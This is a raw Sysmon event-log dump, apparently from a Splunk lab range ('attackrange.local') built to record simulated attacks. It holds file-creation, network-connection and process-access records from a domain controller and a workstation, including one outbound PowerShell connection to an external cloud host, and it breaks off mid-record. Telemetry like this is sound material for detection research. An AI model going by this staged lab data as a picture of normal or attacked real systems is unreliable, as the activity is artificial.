Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FC0B9870BF5F252F320640D409CDF8A,SHA256=445DCDF884A2C62D1D635CA62DA35A32ADDECD7D48A0B24142B148BBA489F63E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104519Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:34.525{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8BF48622356445BC59F2D60387F2472,SHA256=661C3399A6E22687EEE8DB1590F4F09D119CE8C36336026E206EF94C1B3BD1E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149504Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:34.699{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4691FF55E6863E5F8086678151D6BD48,SHA256=76D55EA6DEE37C7F343A7814EC3C0EE47FE2DB547CF9FA504698FC5E04C78DD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104520Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:35.891{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E69FC0B2FCB27920A2AFF40E1F61B9BA,SHA256=620A30328BC4266989204FF658209918CA2A640E29F40ABB8C9612AD5F33ADD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149505Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:35.721{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CE57841554FE47356957873922E2D79,SHA256=73F1C28BD3A8B0F826C0C95AC6906ADDF34556A8E6EDD328220703A455BCF057,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104521Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:34.928{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55383-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000149508Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:34.919{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58328-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000149507Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:36.748{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64EF0E2BEC3BF68AE770022313F946C2,SHA256=ED7AF62B14A742FB64E688AAED61B736AB4851997BE4084E9244246FFAEB65D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149506Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:36.114{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62CAC9F459E206CDA8B5103FDAC527E2,SHA256=0FB4035378DA619AAF1E69D95393D5E659060B82AF5AD862FD42452F1A77416D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104525Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:37.934{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2C3E4D038E68B2DE8AA722227BD25B2B,SHA256=B7F9FF13CDD921E48A91AFC525F68A980498529889E8EF569864B5B386E10F97,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104524Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:36.232{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55384-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 354300x8000000000000000104523Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:36.232{54715871-FD28-60C9-2600-00000000CF01}2840C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55384-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 23542300x8000000000000000104522Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:37.253{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE5C2790FB6B8352758F156EBF8A3BC2,SHA256=8435E3B619E764F3466946085825DE079C178B7C1DF112CB1E43D8D32FCADDA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149509Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:37.766{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4303A6C2C84BEA5E9C4664AA57BBD96A,SHA256=C21A33B9284CA722989E61E2CEE856059AE26D66B7CE0DFB108AB8A88819183E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104526Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:38.615{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1536DFA5111293DAA9D7709E721BA050,SHA256=4EF7EB5E9C5F0B75EB362E7EA3F32C02202DAE026ADB0A64E5072766DEF47255,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149511Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:38.812{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B7E019F498DE1730DD88962863CC164,SHA256=DD9A9B203306986253817D1D72922811552446656F3463CF9AD1734695B36413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149510Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:38.350{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=161C53EED0A6F0AD759D4FC59779FF34,SHA256=A585D42251C01AB7D516D930C4506376E6AD3819729EBA05BC30A8D6636BF0FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104527Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:39.982{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F588189125B7F6576E179D3F937A0758,SHA256=F7A95246909ACE0A646C8FC9B4079BFE87DA9D89216FEDD5771CBE8229C6DCAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149515Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:39.827{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=526FB320009B335BFF261AF46AC47F88,SHA256=BAE4305DE7456FD257216492A3F886441F6D0EC2065AFA546DE30C983B3923E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149514Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:39.028{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149513Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:39.012{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149512Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:39.012{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149519Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:40.846{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F812A4F2BC5E772E4174680E96DA35,SHA256=F7C4BDEB993B53927CA9BC1A534896CCE09BB38B0C61D6ABCD20568DC645AE47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149518Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:40.512{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149517Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:40.512{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149516Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:40.512{39BD8DE3-0F64-60CA-0B00-00000000D101}6245668C:\Windows\system32\lsass.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104528Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:41.351{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0BFF05983E3579E3954241BE8261D01,SHA256=45E133F2CED1E6866901959BA5E5631D35EC2527518B6C52988337381DBAC9B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149522Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:41.865{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55126999448101052B87C4C39D400300,SHA256=3EEE12BF891E8C42AEBA5FDEABF37CAAC1FA831673875EA6583BA4C6E5C66AD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000149521Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:40.016{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58330-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000149520Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:41.211{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36D1FA57A74D738DBFB360C6E2630A80,SHA256=E8FB3D32B7121E52BAF3F9D90CEFC4EF15E703BE728CC709458CD63012CC2621,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104530Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:40.852{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55385-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104529Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:42.713{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E47807AA8AF4A9B380F78F0F0FEBF9C7,SHA256=C36A7DB3D1911E45DB6C871EB143EA163F4A32EF0CC6B1E303087293E4A288B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149528Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:42.865{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B36BD798C97EA9F709330606FDF82B75,SHA256=4E5900284424DAA0CD8269B530260A2E450FFE3584C00F57723172DEE3E4AC67,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000149527Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:40.985{39BD8DE3-2672-60CA-E003-00000000D101}5836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58331-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x8000000000000000149526Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:42.065{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba|C:\Program Files\Mozilla Firefox\xul.dll+2d7fa7f 10341000x8000000000000000149525Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:42.065{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 10341000x8000000000000000149524Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:42.045{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d85d07|C:\Program Files\Mozilla Firefox\xul.dll+da5ebb 10341000x8000000000000000149523Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:42.045{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916 10341000x8000000000000000149538Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:43.951{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149537Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 